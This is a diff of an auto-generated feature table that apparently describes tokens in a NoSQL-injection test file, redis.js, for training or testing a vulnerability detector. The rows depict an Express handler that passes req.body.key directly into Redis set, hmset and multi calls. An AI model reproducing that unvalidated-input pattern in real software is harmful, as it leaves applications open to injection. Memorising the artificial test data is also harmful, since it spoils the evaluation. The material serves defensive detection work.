autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:12:18:14 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:12:18:14 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:12:18:14 | set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:12:18:14 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:12:18:14 | set | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:16:18:18 | key | CalleeFlexibleAccessPath | client.set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:16:18:18 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:16:18:18 | key | calleeImports | redis | @@ -4031,6 +19552,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:21:18:27 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:21:18:27 | "value" | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:21:18:27 | "value" | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:10 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:10 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:10 | client | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:10 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:16 | client.hmset | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:16 | client.hmset | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:16 | client.hmset | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:16 | client.hmset | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:16 | client.hmset | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | client. ... alue2") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | client. ... alue2") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | client. ... alue2") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | client. ... alue2") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | client. ... alue2") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | exceptional return of client. ... alue2") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | exceptional return of client. ... alue2") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | exceptional return of client. ... alue2") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | exceptional return of client. ... alue2") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:5:19:56 | exceptional return of client. ... alue2") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:12:19:16 | hmset | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:12:19:16 | hmset | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:12:19:16 | hmset | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:12:19:16 | hmset | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:12:19:16 | hmset | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:18:19:22 | "key" | CalleeFlexibleAccessPath | client.hmset | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:18:19:22 | "key" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:18:19:22 | "key" | calleeImports | redis | @@ -4076,6 +19622,96 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:48:19:55 | "value2" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:48:19:55 | "value2" | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:19:48:19:55 | "value2" | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:22:10 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:22:10 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:22:10 | client | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:22:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:22:10 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:14 | client\\n ... .multi | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:14 | client\\n ... .multi | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:14 | client\\n ... .multi | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:14 | client\\n ... .multi | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:14 | client\\n ... .multi | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | client\\n ... multi() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | client\\n ... multi() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | client\\n ... multi() | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | client\\n ... multi() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | client\\n ... multi() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | exceptional return of client\\n ... multi() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | exceptional return of client\\n ... multi() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | exceptional return of client\\n ... multi() | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | exceptional return of client\\n ... multi() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:23:16 | exceptional return of client\\n ... multi() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:12 | client\\n ... .set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:12 | client\\n ... .set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:12 | client\\n ... .set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:12 | client\\n ... .set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:12 | client\\n ... .set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | client\\n ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | client\\n ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | client\\n ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | client\\n ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | client\\n ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | exceptional return of client\\n ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | exceptional return of client\\n ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | exceptional return of client\\n ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | exceptional return of client\\n ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:24:33 | exceptional return of client\\n ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:12 | client\\n ... .set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:12 | client\\n ... .set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:12 | client\\n ... .set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:12 | client\\n ... .set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:12 | client\\n ... .set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | client\\n ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | client\\n ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | client\\n ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | client\\n ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | client\\n ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | exceptional return of client\\n ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | exceptional return of client\\n ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | exceptional return of client\\n ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | exceptional return of client\\n ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:25:26 | exceptional return of client\\n ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:12 | client\\n ... .get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:12 | client\\n ... .get | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:12 | client\\n ... .get | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:12 | client\\n ... .get | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:12 | client\\n ... .get | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | client\\n ... et(key) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | client\\n ... et(key) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | client\\n ... et(key) | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | client\\n ... et(key) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | client\\n ... et(key) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | exceptional return of client\\n ... et(key) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | exceptional return of client\\n ... et(key) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | exceptional return of client\\n ... et(key) | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | exceptional return of client\\n ... et(key) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:26:17 | exceptional return of client\\n ... et(key) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:13 | client\\n ... .exec | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:13 | client\\n ... .exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:13 | client\\n ... .exec | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:13 | client\\n ... .exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:13 | client\\n ... .exec | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | client\\n ... s) { }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | client\\n ... s) { }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | client\\n ... s) { }) | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | client\\n ... s) { }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | client\\n ... s) { }) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | exceptional return of client\\n ... s) { }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | exceptional return of client\\n ... s) { }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | exceptional return of client\\n ... s) { }) | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | exceptional return of client\\n ... s) { }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:22:5:27:42 | exceptional return of client\\n ... s) { }) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:23:10:23:14 | multi | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:23:10:23:14 | multi | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:23:10:23:14 | multi | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:23:10:23:14 | multi | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:23:10:23:14 | multi | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:10:24:12 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:10:24:12 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:10:24:12 | set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:10:24:12 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:10:24:12 | set | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:14:24:23 | "constant" | CalleeFlexibleAccessPath | client.multi().set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:14:24:23 | "constant" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:14:24:23 | "constant" | calleeImports | redis | @@ -4092,6 +19728,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:26:24:32 | "value" | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:26:24:32 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:24:26:24:32 | "value" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:10:25:12 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:10:25:12 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:10:25:12 | set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:10:25:12 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:10:25:12 | set | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:14:25:16 | key | CalleeFlexibleAccessPath | client.multi().set().set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:14:25:16 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:14:25:16 | key | calleeImports | redis | @@ -4108,6 +19749,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:19:25:25 | "value" | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:19:25:25 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:25:19:25:25 | "value" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:10:26:12 | get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:10:26:12 | get | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:10:26:12 | get | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:10:26:12 | get | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:10:26:12 | get | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:14:26:16 | key | CalleeFlexibleAccessPath | client.multi().set().set().get | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:14:26:16 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:14:26:16 | key | calleeImports | redis | @@ -4116,6 +19762,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:14:26:16 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:14:26:16 | key | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:26:14:26:16 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:10:27:13 | exec | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:10:27:13 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:10:27:13 | exec | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:10:27:13 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:10:27:13 | exec | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:14 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:14 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:14 | this | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:14 | this | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:14 | this | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | 'arguments' object of anonymous function | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | 'arguments' object of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | exceptional return of anonymous function | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | exceptional return of anonymous function | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | functio ... es) { } | CalleeFlexibleAccessPath | client.multi().set().set().get().exec | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | functio ... es) { } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | functio ... es) { } | calleeImports | redis | @@ -4124,6 +19790,56 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | functio ... es) { } | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | functio ... es) { } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | functio ... es) { } | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | return of anonymous function | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:15:27:41 | return of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:25:27:27 | err | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:25:27:27 | err | contextSurroundingFunctionParameters | (req, res)\n(err, replies) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:25:27:27 | err | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| 